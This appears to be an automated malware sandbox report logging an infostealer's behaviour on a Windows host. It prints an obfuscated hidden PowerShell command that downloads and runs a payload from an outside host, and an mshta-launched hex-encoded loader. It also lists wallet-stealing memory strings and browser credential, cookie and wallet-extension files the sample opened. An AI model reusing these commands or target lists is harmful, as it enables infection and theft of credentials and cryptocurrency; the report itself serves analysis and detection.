              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command set-item variable:/b 'net.webclient';sv plm 'https://atsuka.thrivezest.org/hubus.xlsx';sl;si variable:\z (.$executioncontext.(($executioncontext|gm)[6].name).(($executioncontext.(($executioncontext|gm)[6].name).psobject.methods|where-object{(dir variable:\_).value.name-like'g*cm*t'}).name).invoke($executioncontext.(($executioncontext|gm)[6].name).(($executioncontext.(($executioncontext|gm)[6].name)|gm|where-object{(dir variable:\_).value.name-like'*com*e'}).name).invoke('*w-*ct',1,$true))(childitem variable:\b).value);si variable:o ((((variable z).value|gm)|where-object{(dir variable:\_).value.name-like'*wn*g'}).name);($executioncontext|foreach{(dir variable:\_).value.(($executioncontext|gm)[6].name)|foreach{$_.(($executioncontext.(($executioncontext|gm)[6].name).psobject.methods|where-object{(dir variable:\_).value.name-like'*w*i*ck'}).name).invoke((variable z).value.((gv o -valueo)).invoke((variable plm).value))}}).invoke()
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function htxbx($eywy){return -split ($eywy -replace '..', '0x$& ')};$smkl = htxbx('0f7a7222e17cfb1bb92172cfd10b1a0a35f2d236de6dd8d72d66b13fedb4d7cf6a19fa5e844d4ea4bda294b8324f3d40bbe3a32fa2f602f7eec40e64690703556f440e32e54db889f70490bfab024711ba156e7ef3961fb117120cba4913ea1e5d84acf6f55eba7c85c4edeae94ca6f88e91d98428ff8c02dea04eb6bc87cd7054da2412b8e711f8c1a790edd10e33300549b54953e993973674c4c6b322df9a94608d0e38bf1b68335f96bfdc063a0acac3f5674c4fb62fd421afd6b98437f6e9805448603b36d23a3100350c5424a024debee06efccb25bc5c2ed9e55f0ecdf8d82a5f5b3dde3dd01d9414613dc77c41ff3714787ca86bab941a84fa1697bfd67ae1442e846f4c0bcd12067b97f4c4761c790d99134685bd29d33eb13930e881348cceb581a392f1c4d3a954998de262a182e3ba192bc030972631dff7761b192a8e761fb393f15cec5503f481993757b7386a6defcb30893cb5510f8d9dfcd357a4503657121993c1da20619fc16a76829a33dc8bec2c25b345e40d743ae3fa6908a2256106edb3d401a541bbc6b63d25361ed338a28142aedfd2e2afa4224709fd2ab99578cad2d426ac01b625107469b2cfc6f80544cd0418a85df7b0034592f05c391690f1cb1f0e38c8c36984958b671982168da7fcd4ba7b76da7d1f52fbd0449c19027b914fde6de5faaa8cb6bf3f2a4274a8f5cceed4e85fe2bae43e079db816a326cfec5cf89e8bda8c7656d7abb681564558044e3e53669ee9994092f98411ab22f4889a3454bb3da6791db0f9c47830f4c06a5461824c4cd5af8028e685aaa4298897434d4728edcf0c7f21c0c4a773c3b93b8d500ad8247e5f882a6d58627b2848a409f59326ce2f3c94419453cbd81d72a42efc7700bf0f755ebf04e26adc65680a8ab81dc31b386413f68bdcdf1c0851eabfb0bbae9ccc1eec68f50a6c1e0d56474f854ae2306a1e2a3f8b94a0127dd3e51c4a536048ef14cdbf4b53a4e0c3eefefa4eed2cfe4541e54f2d69773940d13f9015002c0555fdc45820883ee8d40d25214d7139e6e12032c2bfe100c55fa40524f297c439b1a01353d2284c6cef35ac57e4400eda829b3e642624cdfa0bc2973809dc3345e9e56c2d1156147cea34b91cfff59896e54208b4cfd4207a17f7308c33d76c6413ab80c8d92695ddc466bc03f75d4179a7f1740b7a3e5a6c6d80f2fb8d74ffb55bd62e27d14a6503857d18986d8e19a1d8e35ad79fee150abe148d1b1c3e2d9d92c0b0bdf7de18dff55fd02b3212cc62401c8900caecaaade5361bfc807f5384eea46babda1f2032769cda2b56a725574ad832150b7026d06d0547d37743bd92a3253a6be7c4be7457307e6cde57b7840c35ecc06809a8fa8bf2351601ea6c1e3a025ba6cd107626bbf16cfed99355a4ac130ad2bef7d8e3b1d936dc4d667bae44082e02e0251c2355712885575901aefdc0139aa662d0b9c4acbf7403673b3c7ddf9e6e3ab15a286fc41c2d998ed91edd22436ba61dd3f3d745e36681712d110962fbd642a2cb901801e7af328696116a425ac0d6f7c474a297ebc5f89a3c52ee8db03de0214b816208ad47e4a4eb4864f152130aea847ad1031a9dded4248d031bce58b447eb0cc8763d2cdbf3348d053d54b42c707d6de3b3166fbf46cfb8f8ab676945a5d0b7ff4dd2daf54b40f69592d58649efe2b1f4cdadc627160733882c0c916de660976cbcd588f71a3d08308a76f8b82ed698b928d9b2c66911f8a2975942ac360069ac4b4d6c8c7e50e99b0cbd066a58477b4f336f9b12a5fe792e23ed42c6032b887e634abca3d08214b16e5953bbd4ffbd057e229e4b7a149d754e75229cd7b38cb289b484ae636864dafc411fea976653dc57f0e7b6ea81960ac0059db8fd2e23f7d92abd90cdc902bb6f71f0094ef783bb18777a34e0b7531a8c1a945811e9cb1db684d8Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command set-item variable:/b 'net.webclient';sv plm 'https://atsuka.thrivezest.org/hubus.xlsx';sl;si variable:\z (.$executioncontext.(($executioncontext|gm)[6].name).(($executioncontext.(($executioncontext|gm)[6].name).psobject.methods|where-object{(dir variable:\_).value.name-like'g*cm*t'}).name).invoke($executioncontext.(($executioncontext|gm)[6].name).(($executioncontext.(($executioncontext|gm)[6].name)|gm|where-object{(dir variable:\_).value.name-like'*com*e'}).name).invoke('*w-*ct',1,$true))(childitem variable:\b).value);si variable:o ((((variable z).value|gm)|where-object{(dir variable:\_).value.name-like'*wn*g'}).name);($executioncontext|foreach{(dir variable:\_).value.(($executioncontext|gm)[6].name)|foreach{$_.(($executioncontext.(($executioncontext|gm)[6].name).psobject.methods|where-object{(dir variable:\_).value.name-like'*w*i*ck'}).name).invoke((variable z).value.((gv o -valueo)).invoke((variable plm).value))}}).invoke() Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: powershell.exe, 00000016.00000002.3665275832.0000000002C53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1208, type: MEMORYSTR
              Source: powershell.exe, 00000016.00000002.3668769118.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ctrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},{"t":0<
              Source: powershell.exe, 00000016.00000002.3668769118.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 1520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/E
              Source: powershell.exe, 00000016.00000002.3668769118.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wa@
              Source: powershell.exe, 00000016.00000002.3668769118.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: nance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\Indexed
              Source: powershell.exe, 00000016.00000002.3668769118.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus",
              Source: powershell.exe, 00000016.00000002.3668769118.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus",
              Source: powershell.exe, 00000016.00000002.3668769118.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":209L
              Source: powershell.exe, 00000016.00000002.3665275832.0000000002C6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: powershell.exe, 00000004.00000002.2195805033.0000000007740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: sqlcolumnencryptionkeystoreprovider
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
